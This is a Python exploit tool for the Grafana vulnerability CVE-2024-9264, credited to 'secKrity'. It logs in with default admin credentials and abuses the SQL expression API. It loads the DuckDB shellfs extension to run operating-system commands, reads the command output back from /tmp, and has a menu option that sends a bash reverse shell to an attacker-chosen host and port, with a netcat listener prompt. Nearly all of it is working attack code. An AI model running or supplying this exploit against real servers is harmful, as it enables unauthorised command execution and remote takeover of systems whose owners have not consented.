#!/usr/bin/env python3 import requests import sys import logging from psycopg2.extensions import adapt from typing import List, Optional, Any from colorama import Fore, init from packaging.version import Version, InvalidVersion init(autoreset=True) # ------------------------- # 프롤로그 # ------------------------- print(r""" _ __ _____ _____ _____ ___ | | / /|_ _|/ ___||_ _| / _ \ | |/ / | | \ `--. | | / /_\ \ | \ | | `--. \ | | | _ | | |\ \ _| |_ /\__/ / _| |_ | | | | \_| \_/ \___/ \____/ \___/ \_| |_/ Edited by : secKrity - 이민준 CVE ID : CVE-2024-9264 Affected product : Grafana Vulnerable version : prior to 11.0.5+security-01, prior to 11.0.6+security-01, prior to 11.1.6+security-01, prior to 11.1.7+security-01, prior to 11.2.1+security-01, prior to 11.2.2+security-01 """) # ------------------------- # 로깅 설정 # ------------------------- logging.basicConfig( filename="grafana_exploit.log", level=logging.INFO, format="%(asctime)s - %(message)s", ) def log_event(event: str, url: str = "", payload: str = ""): logging.info(f"EVENT={event} URL={url} PAYLOAD={payload}") # ------------------------- # 유틸: 컬러 출력 # ------------------------- def info(msg: str): print(Fore.YELLOW + "[*] " + msg) def success(msg: str): print(Fore.GREEN + "[+] " + msg) def vuln(msg: str): print(Fore.RED + "[-] " + msg) def error(msg: str): print(Fore.RED + "[!] " + msg) # ------------------------- # Grafana Exploit 클래스 # ------------------------- class GrafanaExploit: def __init__(self, base_url, user="admin", password="admin"): self.base_url = base_url.rstrip("/") self.session = requests.Session() self.user = user self.password = password def get_version(self) -> str: urls = ["/api/health", "/api/frontend/settings"] for path in urls: url = self.base_url + path try: r = self.session.get(url, timeout=5) log_event("version_check", url) if r.status_code == 200: data = r.json() if "version" in data: return data["version"] if "buildInfo" in data and "version" in data["buildInfo"]: return data["buildInfo"]["version"] except Exception as e: error(f"Version Check Failed: {e}") return "Unknown" def login(self) -> bool: url = self.base_url + "/login" data = {"user": self.user, "password": self.password} try: r = self.session.post(url, json=data) log_event("login_attempt", url, str(data)) if r.status_code == 200 and "Logged in" in r.text: return True except Exception as e: error(f"Login Failed: {e}") return False def run_query(self, query: str) -> Optional[List[Any]]: url = self.base_url + "/api/ds/query?ds_type=__expr__&expression=true&requestId=Q101" payload = { "from": "1729313027261", "to": "1729334627261", "queries": [ { "datasource": {"name": "Expression", "type": "__expr__", "uid": "__expr__"}, "expression": query, "hide": False, "refId": "B", "type": "sql", "window": "", } ], } try: r = self.session.post(url, json=payload) log_event("run_query", url, query) return r.json()["results"]["B"]["frames"][0]["data"]["values"] except Exception: return None def check_vuln(self): tmp_file = "/tmp/grafana_id" query = ( "SELECT 1;" "install shellfs from community;" "LOAD shellfs;" f"SELECT * FROM read_csv('id >{tmp_file} 2>&1 |')" ) self.run_query(query) return self.read_remote_file(tmp_file) def read_remote_file(self, filepath: str) -> Optional[bytes]: escaped_filename = adapt(filepath) query = f"SELECT content FROM read_blob({escaped_filename})" result = self.run_query(query) if result: content = result[0][0] try: decoded = content.encode("utf-8").decode("unicode_escape").encode("latin1") return decoded except Exception: return content.encode() return None def reverse_shell(self, lhost: str, lport: int): tmp_file = "/tmp/grafana_rs" cmd = f"bash -c \"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1\"" query = ( "SELECT 1;" "install shellfs from community;" "LOAD shellfs;" f"SELECT * FROM read_csv('{cmd} >{tmp_file} 2>&1 |')" ) self.run_query(query) return None # ------------------------- # 메뉴 실행 # ------------------------- def menu(): print("\n[ Menu ]") print("1) Version Check") print("2) Vuln Check") print("3) Exploit") print("4) Exploit with Reverse Shell") print("5) Exit") if __name__ == "__main__": if len(sys.argv) < 2: error(f"Usage: {sys.argv[0]} ") sys.exit(1) url = sys.argv[1] info("Taget URL: " + url) exploit = GrafanaExploit(url) while True: menu() choice = input(">> ") if choice == "1": log_event("Version Check Started") info("Checking Grafana Version...") ver = exploit.get_version() vuln("Grafana Version: " + ver) elif choice == "2": log_event("Vuln Check Started") ver = exploit.get_version() info("Current Grafana Version: " + ver) # CVE-2024-9264 영향/패치 버전 목록 patched_versions = [ "11.0.5+security-01", "11.0.6+security-01", "11.1.6+security-01", "11.1.7+security-01", "11.2.1+security-01", "11.2.2+security-01", ] vulnerable_start = "11.0.0" try: curr = Version(ver) vs = Version(vulnerable_start) min_patched = min(Version(v) for v in patched_versions) if curr < vs: success(f"{ver} is not vulnerable to CVE-2024-9264") elif curr >= min_patched: success(f"{ver} is not vulnerable to CVE-2024-9264") else: vuln(f"{ver} is vulnerable to CVE-2024-9264") except InvalidVersion: error(f"Version parse failed: {ver}") elif choice == "3": log_event("Exploit Started") info("Trying to Login...") if exploit.login(): success("Login Success") info("Exploit...") output = exploit.check_vuln() if output: vuln("Exploit Success (id Result):") print(output.decode(errors="ignore")) else: success("Exploit is not working") else: error("Login Failed") elif choice == "4": log_event("Exploit with Reverse Shell Started") info("Trying to Get Reverse Shell...") if exploit.login(): success("Login Success") lhost = input("Attacker IP (LHOST): ") lport = input("Attacker PORT (LPORT): ") try: lport = int(lport) info(f"Trying to Connect Reverse Shell ({lhost}:{lport})") info(f"Attacker must be running `nc -lvnp {lport}` Command") exploit.reverse_shell(lhost, lport) vuln("Reverse Shell Query Transmission Success.") except Exception as e: error(f"Reverse Shell not working: {e}") else: error("Login Failed") elif choice == "5": log_event("Exit Started") info("Exiting...") break else: error("Wrong Input")